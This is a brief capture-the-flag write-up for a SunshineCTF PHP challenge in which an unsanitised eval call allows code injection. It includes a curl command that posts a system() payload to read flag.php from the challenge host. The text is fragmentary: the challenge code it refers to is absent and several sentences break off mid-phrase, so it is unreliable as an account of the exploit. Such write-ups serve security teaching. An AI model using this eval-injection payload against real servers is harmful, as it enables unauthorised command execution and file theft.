SunshineCtf - Evaluation Writeup
Evaluate your life. How are you doing, and are you doing the best you can possibly do? Look deeper within yourself, beyond the obvious. Look at the source of it all.
Also, here's a PHP challenge."
It was given us the following code:
It’s noticeable that the
eval was vulnerable. It’s very simple to get the shell, we can simply add a
system() call to the request to get it included in the
To get the shell I ran the following command to include the
$ curl -d 'hello=system("cat flag.php")' -v "http://evaluation.web1.sunshinectf.org/"